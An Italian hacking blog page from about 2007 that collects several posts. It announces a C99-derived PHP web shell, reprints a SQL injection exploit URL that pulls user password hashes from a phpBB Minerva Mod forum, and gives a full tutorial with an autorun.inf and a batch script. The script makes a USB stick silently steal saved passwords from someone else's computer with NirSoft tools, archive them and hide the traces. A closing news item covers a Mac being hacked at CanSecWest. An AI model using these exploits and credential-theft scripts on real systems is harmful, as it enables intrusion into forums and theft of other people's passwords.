Il Captain Crunch Team sforna una nuova shell , derivata dalla C100 e dalla ancor più vecchia C99 .
E’ possibile scaricare la shell da qui.
(Se usi Firefox, fai tasto destro su “qui” e clicca su “Copia Indirizzo”, apri un’altra scheda e incolla il link).
Un exploit per piattaforma forum PhpBB versione 2.0.21, che agisce attraverso Remote SQL Injection. La sintassi è la seguente:
http://www.sitovittima.com/forum.php?c=-1/**/UNION/**/SELECT/
**/0,1,2,3,4,user_password,6/**/FROM/**/minerva_users%20where%20user_id=2/*
(tutto attaccato ovviamente)
======================X=O=R=O=N===================== + + PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit + ======================X=O=R=O=N===================== + + Bulan: xoron + + xoron.biz + ======================X=O=R=O=N===================== + + SQL INJ: + + forum.php ?c=-1/**/UNION/**/SELECT/ **/0,1,2,3,4,user_password,6/**/FROM/**/minerva_users%20where%20user_id=2/* + ======================X=O=R=O=N===================== + + Example: http://www.ayyquerico.com/Portal/ + ======================X=O=R=O=N===================== + + Special thanx: ajann + ======================X=O=R=O=N===================== # milw0rm.com [2007-03-19]
Il sito web Nirsoft fornisce diversi programmi gratuiti per recuperare le password salvate nel computer che si sta usando nel caso in cui le si dimenticano.
E’ possibile però usare questi programmi gratuiti per altri scopi, come rubare le password del computer che si sta utilizzando.
Se un malintenzionato ha accesso fisico al computer da cui rubare le password, ha a disposizione solo pochi secondi per compiere l’operazione. Da questa necessità, ecco l’idea di usare una chiavetta USB.
Con questo articolo, voglio semplicemente farvi vedere come sia facile creare una chiavetta USB che, inserita nel computer che ci interessa, salva le password trovate all’interno della chiavetta stessa. Non mi assumo la responsabilità dell’uso che ne farete.
Allora…
Per realizzare questa chiavetta USB speciale, prima di tutto, create una cartella sul vostro desktop con il nome di Chiavetta. Questa cartella conterrà tutti i file che andranno copiati nella chiavetta.
Collegatevi alla pagina del sito web di Nirsoft per scaricare i programmi per recuperare le password. Vi consiglio di scaricare solo i programmi che vi recuperano le password che vi interessano. Se avete intenzione, ad esempio, di recuperare solo le password dei programmi di chat e quelli delle e-mail, scaricate i programmi MessenPass e Mail PassView.
Dopo aver scaricato i pacchetti con i programmi per recuperare le password, estraeteli nella cartella Chiavetta. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.
A questo punto, scaricate ed installate l’ultima versione di Winrar. Andate su http://rarlab.com/rar/wrar362it.exe e scaricate il file. Dopo aver installato Winrar, andate su Start/Risorse del computer/C:/Programmi/WinRAR, copiate ed incollate il programma Rar.exe nella cartella del desktop Chiavetta.
Adesso aprite il Blocco Note, andando su Start/Tutti i programmi/Accessori/Blocco note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella Chiavetta:
@nomedelprogramma.exe /sverhtml nomedelprogramma.html
Al termine del file scrivete, invece, le righe:
REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e? %DATE% e sono le %TIME% >> log.txt
REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul
REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
In breve, quando avvierete questo piccolo programmino, le password verranno recuperate dal computer e salvate in diversi file .HTML. A questo punto, questi file HTML vengono inseriti in un archivio .RAR protetto da password.
La password dell’archivio deve essere specificata al posto della parola PASSWORD.
La password è case sensitive: fanno differenza, quindi, le lettere maiuscole e quelle minuscole. Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR. Nel mio caso (programmi MessenPass e Mail PassView), ho scritto queste righe:
@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html
REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e? %DATE% e sono le %TIME% >> log.txt
REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul
REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome e, nella finestra che si apre, scrivete lancia.bat in Nome file e selezionate Tutti i file in Salva come. Il file deve essere salvato nella Chiavetta.
Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:
[autorun]
open=lancia.bat
action=Preleva password
Dovete semplicemente copiare tutti i file nella cartella principale della vostra chiavetta USB per concludere la sua creazione. Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la chiavetta.
Si aprira una finestra. Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all?interno dell?archivio protetto .RAR. A questo punto, basta staccare la chiavetta ed andare in un computer sicuro con Winrar installato per leggere le password trovate.
Alla CanSecWest Security Conference di Vancouver, in Canada, un hacker è riuscito a entrare in un sistema Mac, vincendo un premio di diecimila dollari.
L’iniziativa, lanciata proprio dagli organizzatori della conferenza, era volta a mostrare come anche Osx avesse dei buchi.
“C’è un sacco di gente che lavora su Osx perché pensa che sia assolutamente sicura”, ha spiegato Dragos Ruiu, uno degli organizzatori. “In realtà – continua – Microsoft sta attualmente lavorando molto di più sul settore della sicurezza di quanto non stia facendo la Apple”.
Il contest originariamente era aperto solo ai partecipanti alla conferenza e chiedeva, a chi volesse provare, di cercare di entrare nel sistema attraverso un access point wireless. Giovedì, invece, la divisione TippingPoint di 3Com ha messo il sistema online (in modo che tutti potessero partecipare) e ha indetto un montepremi.
Il nome del vincitore non è stato reso noto, ma probabilmente si tratta di uno dei partecipanti alla conferenza.
“Avevo sentito di un sacco di gente – prosegue Ruiu – capace di entrare nei sistemi Mac e ho voluto metterli alla prova”. Non a caso, secondo alcuni analisti, Apple avrebbe rilasciato proprio giovedì un aggiornamento di sicurezza.
 | drunkel su Paint e il browser nascos… |
 | ubuntubox su Paint e il browser nascos… |
| drunkel su Nintendo incrementa vendite e… |
| ubuntubox su Nintendo incrementa vendite e… |
 | Mr WordPress su Benvenuto!! |
